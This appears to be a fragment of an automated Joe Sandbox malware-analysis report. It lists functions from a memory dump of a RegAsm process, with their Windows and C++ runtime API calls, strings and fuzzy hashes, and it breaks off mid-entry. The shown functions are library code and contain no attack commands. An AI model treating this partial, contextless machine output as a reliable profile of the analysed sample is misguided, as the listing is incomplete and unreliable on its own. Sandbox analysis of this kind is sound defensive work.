                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6057e8de4a3bc3946397680d610b676326f041e0c2e18d8cea43842d062cffb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D318FB1A012049FCB14DF54C859AEEBFF4BFA9308F14885DE586A7391DB749944CB60
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • .?AVAuthenticatedSymmetricCipher@CryptoPP@@, xrefs: 00567DA3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                          • String ID: .?AVAuthenticatedSymmetricCipher@CryptoPP@@
                                                                                                                                                                                                                                          • API String ID: 1707706676-708400366
                                                                                                                                                                                                                                          • Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                                                                                                                                                                                                          • Instruction ID: 6183c815ec9eaf9a494310280fafbb1ff3a34c911f8066f673c7857368414e6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 294167359082099BCF11CF68C481AEEBFF5FF59718F14488AE851A7381D632AE04CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 0054976D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Decorator::getDimensionSigned
                                                                                                                                                                                                                                          • String ID: `template-parameter$void
                                                                                                                                                                                                                                          • API String ID: 2996861206-4057429177
                                                                                                                                                                                                                                          • Opcode ID: 429f89e7201006709f20a43ec1909a92f9b461d6af2dcfb0a2af1a8c6fb3cefb
                                                                                                                                                                                                                                          • Instruction ID: 78ea58bf3f5d40766a66675f153a780f9fd7fd566ba505c7f4f6f0a5f7840526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 429f89e7201006709f20a43ec1909a92f9b461d6af2dcfb0a2af1a8c6fb3cefb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A312F719042099BDF04DBE4D85ABFFBBF8BB59318F10442AE601F7191DB746A08DB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8341C89B,?,?,00000000,0056B350,000000FF,?,00550494,?,?,00550468,00000000), ref: 005504ED
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005504FF
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,0056B350,000000FF,?,00550494,?,?,00550468,00000000), ref: 00550521
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 715ae26f1df17045483f44e7f30f7cbd8e75caaab172ca77aed8a01661f39ecc
                                                                                                                                                                                                                                          • Instruction ID: edd3f38bb49b7ed2c59420e0eea74cbf21de6eeb82f48ed1eb935a135c82407f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 715ae26f1df17045483f44e7f30f7cbd8e75caaab172ca77aed8a01661f39ecc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60016235A44659EFDB118F54DC09BBEBFB8FB05B16F000626F861A32D0EBB59904CA90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00418612
                                                                                                                                                                                                                                          • int.LIBCPMTD ref: 00418624
                                                                                                                                                                                                                                            • Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
                                                                                                                                                                                                                                            • Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 0041866B
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004186E1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3053331623-0
                                                                                                                                                                                                                                          • Opcode ID: 9dfa335a9617bfa51966f1f9c5bcca831a14ce292f15ae3f1da6f232f06b58cf
                                                                                                                                                                                                                                          • Instruction ID: 4f9b08ad9ea1833e01c620b55d558fd689047bf99b404b2cebb7e2b18f99977d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dfa335a9617bfa51966f1f9c5bcca831a14ce292f15ae3f1da6f232f06b58cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631B4B5D00209DFCB04DF95D585AEEBBB1BF48304F10866AE815B7390DB346A45CF95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0053FFFA
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00540005
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00540073
                                                                                                                                                                                                                                            • Part of subcall function 00540156: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0054016E
                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00540020
                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 00540036
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                          • Opcode ID: 55633578a96282770fe92a03875ab03946d864bce54cf0b12479ebad27d1b95f
                                                                                                                                                                                                                                          • Instruction ID: 01b92c8581a9b4f7daa214a8d17a277ee38d8442a4420f2831fb8f25587f8b46
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55633578a96282770fe92a03875ab03946d864bce54cf0b12479ebad27d1b95f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED01DF75A005168BCB06EB20CC596BC7FA1FFE8340B14501AED1257392CF746E06DBC1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Replicator::operator[].LIBCMT ref: 0054556B
                                                                                                                                                                                                                                          • DName::operator=.LIBVCRUNTIME ref: 00545600
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator=Replicator::operator[]
                                                                                                                                                                                                                                          • String ID: 6VT$6VT
                                                                                                                                                                                                                                          • API String ID: 3211817929-3469345667
                                                                                                                                                                                                                                          • Opcode ID: 505c11219b8a677678f10478d5e0515d3b53fb340e56792bb3c65efe8514eb71
                                                                                                                                                                                                                                          • Instruction ID: 436718d72e149dd348de0bf8956e36b9ce54331c099c73560438a4ae18dc5a68
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 505c11219b8a677678f10478d5e0515d3b53fb340e56792bb3c65efe8514eb71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0313631600A049FDB14DBA4E8497FE7FAAFB56B1DF14442DE582D7282EF789844CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00544103: pDNameNode::pDNameNode.LIBCMT ref: 00544129
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 0054690B
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00546919
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name$Name::Name::operator+NodeNode::p
                                                                                                                                                                                                                                          • String ID: void$void
                                                                                                                                                                                                                                          • API String ID: 3257498322-3746155364
                                                                                                                                                                                                                                          • Opcode ID: e6938d89f6235a91674158057764b790ed661707474b7a1337765f99360457c9
                                                                                                                                                                                                                                          • Instruction ID: 2e0dcc8e48a0956e0fc30b177fb4e7bc1997c403489e9a914e9954fe780c0bce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6938d89f6235a91674158057764b790ed661707474b7a1337765f99360457c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E72131B5904109EFDF04DF90C859AFE7FB8FB09308F108559E906A7251EBB05658DF51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(8341C89B,00000000,00000000,00000000), ref: 00558AC4
                                                                                                                                                                                                                                            • Part of subcall function 0055C005: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0055DF67,?,00000000,-00000008), ref: 0055C066
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00558D16
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00558D5C
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00558DFF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                          • Opcode ID: 02c84562db3c98fad455ef878ab7dbca0ae57f6865a1298bf05add676ed35f88
                                                                                                                                                                                                                                          • Instruction ID: c0e2e953aae1e6e7c68fbab58dcd358975a46ae928b399a39bb9de7c245bd999
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02c84562db3c98fad455ef878ab7dbca0ae57f6865a1298bf05add676ed35f88
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AD17AB5D002489FCF05CFA8D8949ADBFB9FF48315F28452AE856FB351DA30A949CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0054692A
                                                                                                                                                                                                                                          • UnDecorator::getSymbolName.LIBCMT ref: 005469BC
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00546AC0
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 00546B63
                                                                                                                                                                                                                                            • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                            • Part of subcall function 005446D9: DName::DName.LIBVCRUNTIME ref: 00544727
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1134295639-0
                                                                                                                                                                                                                                          • Opcode ID: 17b545686ffbd83f461e5fa8e49ff6911f03a41484d8adaf88abe412f4fcb787
                                                                                                                                                                                                                                          • Instruction ID: adde3340624beed78fb7815e48ae6e54cb2a8d11efd9e0536a69273dc1d5f33f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17b545686ffbd83f461e5fa8e49ff6911f03a41484d8adaf88abe412f4fcb787
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD7147B1D00219DFDB00CFA4D885BEDBFB8FB1A318F14542AE941BB291DB749944DB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005470D2
                                                                                                                                                                                                                                            • Part of subcall function 00544216: __aulldvrm.LIBCMT ref: 00544247
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00547033
                                                                                                                                                                                                                                          • DName::operator=.LIBVCRUNTIME ref: 00547117
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 00547149
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+$NameName::Name::operator=__aulldvrm
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2973644308-0
                                                                                                                                                                                                                                          • Opcode ID: 99b5cd79d29699f7cf1e02f05b5d71bffb07d26f1fc7d65a0859f400205991c3
                                                                                                                                                                                                                                          • Instruction ID: b98d7673acd3daae7ff34dee4b301045ff4dff8c8419de0e582cf73e8e56fba6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99b5cd79d29699f7cf1e02f05b5d71bffb07d26f1fc7d65a0859f400205991c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81618AB0904219EFCB14CF94CC85AEEBFB4FB5A308F1494AAE941AB351D7709A44DF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000010), ref: 0051C663
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: operation failed with error $OS_Rng: $P@
                                                                                                                                                                                                                                          • API String ID: 1452528299-2227021971
                                                                                                                                                                                                                                          • Opcode ID: c8262143113b87fae6c2836e7bf24fd7d87294bcdd9b776b340323f15790e968
                                                                                                                                                                                                                                          • Instruction ID: 7d1ade67ec2d759c352fa15240a005782d59d69d9f8779f71aae645f15b0fe31
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8262143113b87fae6c2836e7bf24fd7d87294bcdd9b776b340323f15790e968
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 875116B1D00248EFCB05DFA9D951BEEBBB4BF48304F2085ADE415A7381DB745A44CBA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                          • Opcode ID: cb24858b38ca5f96361cca1c3c554668d37f17c0265753c7f8a9988f1c73d6fe
                                                                                                                                                                                                                                          • Instruction ID: a8bb27bb9ea891491c7cdd180f1d72b25329bb109c8645e91b68c3f2cac08202
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb24858b38ca5f96361cca1c3c554668d37f17c0265753c7f8a9988f1c73d6fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E121FAB5610309ABEB11DF14CC82FAE7BA5FB88704F24C459F9189F285D674E911CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000400,?,?,?,004F4C37,00000000,00000000,?,?,?,004F4C37,?,?,?,00000000), ref: 00540854
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004F4C37,?,?,?,00000000,00000000), ref: 00540860
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,004F4C37,00000000,00000000,?,?,?,004F4C37,?,?,?,00000000), ref: 00540886
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004F4C37,?,?,?,00000000,00000000), ref: 00540892
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 203985260-0
                                                                                                                                                                                                                                          • Opcode ID: 9d15dc997c8cb139624ddcd69354d736c771ef8327062e0090a6e7e09d49c481
                                                                                                                                                                                                                                          • Instruction ID: 0e87ead7e97f2a384fcfa5accfbb4679788fe648df4865f963f00f746cf5b545
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d15dc997c8cb139624ddcd69354d736c771ef8327062e0090a6e7e09d49c481
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB011236600159FB8F221F56DD08D9F3E26FBD97A4B108414FE0596160C631C821EBE0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000), ref: 00565D41
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000,00000000,?,0055942D,?), ref: 00565D4D
                                                                                                                                                                                                                                            • Part of subcall function 00565D13: CloseHandle.KERNEL32(FFFFFFFE,00565D5D,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000,00000000), ref: 00565D23
                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 00565D5D
                                                                                                                                                                                                                                            • Part of subcall function 00565CD5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00565D04,00562328,00000000,?,00558E53,00000000,00000000,00000000,00000000), ref: 00565CE8
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000), ref: 00565D72
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                          • Opcode ID: 2c79a9b71dde108c042268ae03deb70890c93da81b5c5ed260085af2a5d2905b
                                                                                                                                                                                                                                          • Instruction ID: 3094af20ac564f96aac9fc6e02964965070340a0e80f802341230c335d1401f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c79a9b71dde108c042268ae03deb70890c93da81b5c5ed260085af2a5d2905b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF01536180519FBCF222FE5EC0CA9E3F66FB593B1F004110FA5996170E6328920EB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00440EC2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                          • String ID: `XA$`@
                                                                                                                                                                                                                                          • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                          • Opcode ID: 4dde8de92648f45aa932b1f886abd6da58f4c0d728a1e87d73513b7c94c79926
                                                                                                                                                                                                                                          • Instruction ID: cf9dc5a11ffdfd7da4e7bfe6e66161c0542199dd574abb9e9307dff3bba1edc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dde8de92648f45aa932b1f886abd6da58f4c0d728a1e87d73513b7c94c79926
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCF11AB1C102189BCB19EF91DC91AEEB778BF58304F4041AEE50A67251EF346B89CF64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                                                                                          • API String ID: 3732870572-2137968064
                                                                                                                                                                                                                                          • Opcode ID: c87c9cf9bf1fe2ee23a29c9dd72d42d820ebf7870f5806581cae8dae03fbb9d2
                                                                                                                                                                                                                                          • Instruction ID: b7ebbf75f4a4394fdac18510c5a2a831f8dc8d7d0a044abd742ea1c49a61dbf6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c87c9cf9bf1fe2ee23a29c9dd72d42d820ebf7870f5806581cae8dae03fbb9d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCA1D170901659AFCF24CE68C8706AE7FA2FF55326F54855BEC659B281F230D9098B50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00419053
                                                                                                                                                                                                                                          • _memcpy_s.LIBCPMTD ref: 004191C9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProcessorVirtual$Concurrency::RootRoot::_memcpy_s
                                                                                                                                                                                                                                          • String ID: 0#R
                                                                                                                                                                                                                                          • API String ID: 285175975-3773201211
                                                                                                                                                                                                                                          • Opcode ID: 95fc27e3c8f9389f6ed27db32c8cd4d55acb266686f4a6c51a34ddc1af9c5cf6
                                                                                                                                                                                                                                          • Instruction ID: d050780ede4ed4fe07c9849112b8c1208e61c752c872a3d8e8aeee51617b1c59
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95fc27e3c8f9389f6ed27db32c8cd4d55acb266686f4a6c51a34ddc1af9c5cf6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3C1B3B4D006189FCB04CFA8D994ADEF7B5BF88300F20829AD919AB355D734AE85CF54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::ios_base::clear.LIBCPMTD ref: 00417D4B
                                                                                                                                                                                                                                          • std::ios_base::clear.LIBCPMTD ref: 00417F39
                                                                                                                                                                                                                                            • Part of subcall function 00417740: std::ios_base::clear.LIBCPMTD ref: 00417871
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::ios_base::clear
                                                                                                                                                                                                                                          • String ID: c[A
                                                                                                                                                                                                                                          • API String ID: 1443086396-3980679666
                                                                                                                                                                                                                                          • Opcode ID: 95860eb03becb8723b001c641f5228f6b7c6a6bfb6d92c5c8f8a8b04b6f4d650
                                                                                                                                                                                                                                          • Instruction ID: 99249ab2a96b0c4a35e75ad57f5a14d0666851b6228f74897920b8a0745283d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95860eb03becb8723b001c641f5228f6b7c6a6bfb6d92c5c8f8a8b04b6f4d650
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1891D5B4E08249CFDB14CF95C495AEEFBB1BF48314F24815AD9166B391C738A982CF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Replicator::operator[].LIBCMT ref: 00549084
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 005491CF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::Replicator::operator[]
                                                                                                                                                                                                                                          • String ID: ...
                                                                                                                                                                                                                                          • API String ID: 3707554701-440645147
                                                                                                                                                                                                                                          • Opcode ID: a01b4b22351bc9d90848155d3c3f8c5a7721c8d058e1d1aa57873496cbf7ea09
                                                                                                                                                                                                                                          • Instruction ID: 624507bb90be92a33eb7ffec281aefeedb90304f70ce32e58fa6186cfe226072
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01b4b22351bc9d90848155d3c3f8c5a7721c8d058e1d1aa57873496cbf7ea09
